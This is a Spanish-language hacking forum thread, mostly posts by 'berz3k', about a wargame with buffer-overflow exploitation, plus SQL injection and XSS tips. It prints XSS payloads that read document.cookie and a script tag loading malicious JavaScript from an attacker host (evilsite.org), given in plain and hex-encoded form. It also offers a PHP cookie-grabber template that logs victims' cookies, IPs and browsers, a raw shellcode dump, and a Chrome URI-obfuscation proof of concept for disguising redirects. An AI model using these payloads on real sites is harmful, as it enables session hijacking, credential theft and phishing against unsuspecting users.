Mensajes

Mmmm en Windows Vista no rula,  winXP sin problema.

-berz3k.

@Anon

Que bueno hayas puesto un banner con las instrucciones, vaya que ya muchos conociamos algunos binarios vulenerabiles haciendo el "find / -perm", es casi como el primer paso en un auditoria Unix , pero muchos participantes no lo conocen, ademas es FreeBSD x86, como dice sdc no siempre tendras un Linux facil de explotar

Ta estoy en el 2do , a ver si tengo time en la semana

Código [Seleccionar] Expandir


C:/Users/root/Desktop>./HoF
./HoF
fopen(): /tmp/input_7009: No such file or directory



-berz3k.

Ya estoy dentro desde ayer XD, pero eso es la primera parte, cuando estes dentro te daras cuenta que apenas empieza esto..

-berz3k.

@Anon

Esta muy raro todo, platicando con sdc  esta algo incomodo jugar XDD , el primer BoF aveces funciona y aveces se frezzea no entiendo..

Código [Seleccionar] Expandir


???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????°1I?%A1A°↨I?1U1A°↨I?ë▼^%1A%F♀^F°♂%ó??V♀I?1U%O@I?èÜ ÿÿ/bin/shDè¿¿Dè¿¿
Bad system call
C:/Users/root/Desktop


Vale, pues espero nos de tiempo para apoyar , ayudar y asi mismo divertirnos un rato...

-berz3k.

Datos de los cuales puedes borrar, actualizar e insetar dentro de tablas MySQL

Drop
:http://dev.mysql.com/doc/refman/5.0/en/drop-database.html

Insert
:http://dev.mysql.com/doc/refman/5.0/en/insert.html

Update:
http://dev.mysql.com/doc/refman/5.0/en/update.html

Para injeccion recomendaria uses paros proxy o cualquier otro donde puedes manipular los datos.

:http://www.parosproxy.org/


-berz3k.

Se dice que es vulnerable a XSS
:http://es.wikipedia.org/wiki/XSS

Donde se puede injectar diferentes codigos ya sean javascript o vBscript y que ademas no te dara explicaciones de como funciona XDD.

Se puede injectar un codigo ejemplo como este:

Código [Seleccionar] Expandir


";!–"<script>alert(document.cookie);</script>=&{(alert(1))}


O puedes aplicar un "redirect" con un .js mailicioso (propio) con estas caracteristicas.

Código [Seleccionar] Expandir


ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e



Donde tambien pudes usar un cookie grabber, basandote en este template:

Código [Seleccionar] Expandir


    $ip = $_SERVER['REMOTE_ADDR'];
    $referer = $_SERVER['HTTP_REFERER'];
    $agent = $_SERVER['HTTP_USER_AGENT'];

    $data = $_GET['warwolfz'];
    $time = date("Y-m-d G:i:s A");
    $text = "Time: ".$time."nIP:".$ip."nReferer:".$referer."nUser-Agent:".$agent."nCookie:".$data."nn";

    $file = fopen('cookies.html' , 'a');
    fwrite($file,$text);
    fclose($file);

    ?>


[Google Chrome MetaCharacter URI Obfuscation Vulnerability]

Google Chrome MetaCharacter URI Obfuscation Vulnerability

Google chrome is vulnerable to URI Obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link can not be traversed properly in status address bar.This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. The URI specified with @ character with or without NULL character causes the vulnerability.

Vulnerable Systems:
* Chrome version 0.2.149.30
* Chrome version 0.2.149.29
* Chrome version 0.2.149.27

Proof of Concept:

Link1: ftp://anoymous:guest@microsoft.com
Link2: [Without NULL] | http://www.google.com@yahoo.com | [Google --> Yahoo [Obfuscation]]

Link3: http://www.secniche.org%00@www.milw0rm.com [With NULL] SecNiche --> Milw0rm [Obfuscation]

fuente:
http://www.secniche.org/gcuri/index.html

-berz3k.

Moderadores, mover a Seguridad con RedMX

-berz3k.

Roces con RedMx ahora me doy cuenta que es bastante lioso...Xd

-berz3k.

Yep el code no hace nada, a ver si el turco se expresa mejor y entendemos algo...

-berz3k.